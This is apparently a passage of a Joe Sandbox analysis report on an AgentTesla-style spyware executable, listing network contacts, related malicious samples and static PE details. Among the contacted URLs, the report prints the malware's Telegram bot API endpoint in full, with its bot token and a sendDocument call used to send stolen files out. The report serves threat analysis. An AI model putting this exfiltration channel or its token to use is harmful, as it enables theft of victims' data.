            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            api4.ipify.org
            		64.185.227.155
            		truefalse
              		high
              api.telegram.org
              		149.154.167.220
              		truefalse
                		high
                api.ipify.org
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                    		high
                    https://api.telegram.org/bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/sendDocumentfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.apache.org/licenses/LICENSE-2.0Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.comSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersGSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bTheSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://api.telegram.orgSmh3IA9098.exe, 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://api.telegram.org/bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/Smh3IA9098.exe, 00000001.00000002.522261092.0000000002B71000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designers?Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.tiro.comSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designersSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.goodfont.co.krSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.carterandcone.comlSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.sajatypeworks.comSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.typography.netDSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.founder.com.cn/cn/cTheSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/staff/dennis.htmSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://api.ipify.orgSmh3IA9098.exe, 00000001.00000002.522261092.0000000002B71000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://fontfabrik.comSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cnSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://api.telegram.org4Smh3IA9098.exe, 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmlSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.jiyu-kobo.co.jp/Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/DPleaseSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers8Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fonts.comSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.sandoll.co.krSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.urwpp.deDPleaseSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.zhongyicts.com.cnSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://api.telegram.orgSmh3IA9098.exe, 00000001.00000002.522261092.0000000002BF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSmh3IA9098.exe, 00000001.00000002.522261092.0000000002B71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.sakkal.comSmh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    149.154.167.220
                                                    		api.telegram.orgUnited Kingdom
                                                    		62041TELEGRAMRUfalse
                                                    64.185.227.155
                                                    		api4.ipify.orgUnited States
                                                    		18450WEBNXUSfalse

                                                    General Information

                                                    Joe Sandbox Version:37.0.0 Beryl
                                                    Analysis ID:830845
                                                    Start date and time:2023-03-20 18:28:35 +01:00
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 8m 16s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:13
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample file name:Smh3IA9098.exe
                                                    Original Sample Name:9b75823d12157891fafe183679b54831.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@3/1@3/2
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HDC Information:Failed
                                                    HCA Information:
                                                    • Successful, ratio: 95%
                                                    • Number of executed functions: 36
                                                    • Number of non-executed functions: 6
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    18:29:40API Interceptor1x Sleep call for process: Smh3IA9098.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    149.154.167.220https://dev-microvu.pantheonsite.io/wp-content/uploads/2023/03/conn-1.htmlGet hashmaliciousUnknownBrowse
                                                      g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                          Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                            New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                              PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                  PO_IN34023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                    FixDefError.exeGet hashmaliciousXmrigBrowse
                                                                      doc10010679052382012143717.exeGet hashmaliciousAgentTeslaBrowse
                                                                        EPe7VpI8DZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                          NJA7TOaADm.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                            2wJjtj30x6.exeGet hashmaliciousAgentTeslaBrowse
                                                                              iubK8Ka7o7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                Bank_Slip-_701536.docGet hashmaliciousAgentTeslaBrowse
                                                                                  YWombrpvpG.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    Bestellung_(PO4703392)_doc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      Parts.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        DHL_Original_Document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            64.185.227.155CnsRlvK7Ho.exeGet hashmaliciousTargeted RansomwareBrowse
                                                                                            • api.ipify.org/
                                                                                            aKiefGOIEn.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                                                                            • api.ipify.org/
                                                                                            M74aRxVX4H.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                                                                            • api.ipify.org/
                                                                                            WolcGwXQ5c.exeGet hashmaliciousFicker Stealer, RHADAMANTHYS, Rusty StealerBrowse
                                                                                            • api.ipify.org/?format=wef
                                                                                            XZerken3Py.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                                                                            • api.ipify.org/
                                                                                            xc17rfFdOM.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                                                                            • api.ipify.org/?format=wef
                                                                                            8Ghi4RAfH5.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                                                                            • api.ipify.org/?format=wef
                                                                                            fb623f4ae4dcaa007cac4365aa3ce13526ae32b94f2d9.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                                                                            • api.ipify.org/?format=wef
                                                                                            file.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                                                                            • api.ipify.org/?format=wef
                                                                                            48PTRR4pVY.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                                                                            • api.ipify.org/?format=qwd

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            api4.ipify.orgcotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                            • 173.231.16.76
                                                                                            g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 64.185.227.155
                                                                                            FeDex_shipping_document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 64.185.227.155
                                                                                            DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                            • 173.231.16.76
                                                                                            New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                            • 104.237.62.211
                                                                                            TT_copy.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                            • 173.231.16.76
                                                                                            PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 64.185.227.155
                                                                                            PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 64.185.227.155
                                                                                            2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 173.231.16.76
                                                                                            Product_specifications.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 104.237.62.211
                                                                                            REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                            • 104.237.62.211
                                                                                            eRPRiQhQEI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 173.231.16.76
                                                                                            INV_SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 173.231.16.76
                                                                                            IMG_6071220733pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 104.237.62.211
                                                                                            yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 173.231.16.76
                                                                                            yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 173.231.16.76
                                                                                            DHL_AWB_copy_&_draft_COO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 64.185.227.155
                                                                                            FixDefError.exeGet hashmaliciousXmrigBrowse
                                                                                            • 104.237.62.211
                                                                                            main.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                            • 173.231.16.76
                                                                                            Purchase_Order-0823636.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 64.185.227.155

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            TELEGRAMRUhttps://dev-microvu.pantheonsite.io/wp-content/uploads/2023/03/conn-1.htmlGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                            • 149.154.167.99
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                            • 149.154.167.99
                                                                                            setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                            • 149.154.167.99
                                                                                            setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                            • 149.154.167.99
                                                                                            setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                            • 149.154.167.99
                                                                                            setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                                                                            • 149.154.167.99
                                                                                            setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                            • 149.154.167.99
                                                                                            setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                            • 149.154.167.99
                                                                                            setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                                                                            • 149.154.167.99
                                                                                            setup.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                                                            • 149.154.167.99
                                                                                            setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, RedLine, SmokeLoader, VidarBrowse
                                                                                            • 149.154.167.99
                                                                                            setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                                            • 149.154.167.99
                                                                                            setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                                            • 149.154.167.99
                                                                                            setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                                            • 149.154.167.99
                                                                                            New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                            • 149.154.167.220
                                                                                            WEBNXUScotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                            • 173.231.16.76
                                                                                            g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 64.185.227.155
                                                                                            FeDex_shipping_document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 64.185.227.155
                                                                                            DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                            • 173.231.16.76
                                                                                            New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                            • 104.237.62.211
                                                                                            TT_copy.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                            • 173.231.16.76
                                                                                            PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 64.185.227.155
                                                                                            PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 64.185.227.155
                                                                                            2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 173.231.16.76
                                                                                            Product_specifications.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 173.231.16.76
                                                                                            REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                            • 173.231.16.76
                                                                                            eRPRiQhQEI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 173.231.16.76
                                                                                            INV_SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 173.231.16.76
                                                                                            IMG_6071220733pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 104.237.62.211
                                                                                            yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 173.231.16.76
                                                                                            yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 173.231.16.76
                                                                                            DHL_AWB_copy_&_draft_COO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 64.185.227.155
                                                                                            FixDefError.exeGet hashmaliciousXmrigBrowse
                                                                                            • 104.237.62.211
                                                                                            main.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                            • 173.231.16.76
                                                                                            Purchase_Order-0823636.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 64.185.227.155

                                                                                            JA3 Fingerprints

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            3b5074b1b5d032e5620f69f9f700ff0ecotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            Payment Invoice file.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            Budget plan 2023.zipGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            setup.exeGet hashmaliciousXmrigBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            Payment Invoice 0012657.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            FeDex_shipping_document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            PO_IN34023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            Product_specifications.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            eRPRiQhQEI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            INV_SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            IMG_6071220733pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Smh3IA9098.exe.log

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\Smh3IA9098.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1216
                                                                                            Entropy (8bit):5.355304211458859
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                            MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                            SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                            SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                            SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                            Malicious:true
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):7.864829670852181
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            File name:Smh3IA9098.exe
                                                                                            File size:745984
                                                                                            MD5:9b75823d12157891fafe183679b54831
                                                                                            SHA1:1e074aab3a27aebdefa87f520350109c95b31cf4
                                                                                            SHA256:306a4b507ed783c41a906281904642730d4887aac6dcd5d3ee7ba066d0a51efa
                                                                                            SHA512:963331bc8f3da1acb9054bed209418ec6f08158ceffef04fda67b98a28e42a0908b8481d74100c5f1de329f490866821ca0bd4362539a388280355358bb25347
                                                                                            SSDEEP:12288:pr9mYMUnFW/NWTzHRYHjwvgRizNIezQMTO3HeX74zfgxYb+ttNNTY+CE5kgesGI:pr9UUvxgj6gQzNIOLc+sDx2jNTt8
                                                                                            TLSH:5AF402646BA79128F93753BDA6E532814B7E67632713C95D04F211CE0B23B428FD1A3B
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d..............0..L...........k... ........@.. ....................................@................................

                                                                                            File Icon

                                                                                            Icon Hash:209480e66eb84902

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x4b6b82
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x6417B8A5 [Mon Mar 20 01:36:37 2023 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            jmp dword ptr [00402000h]
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
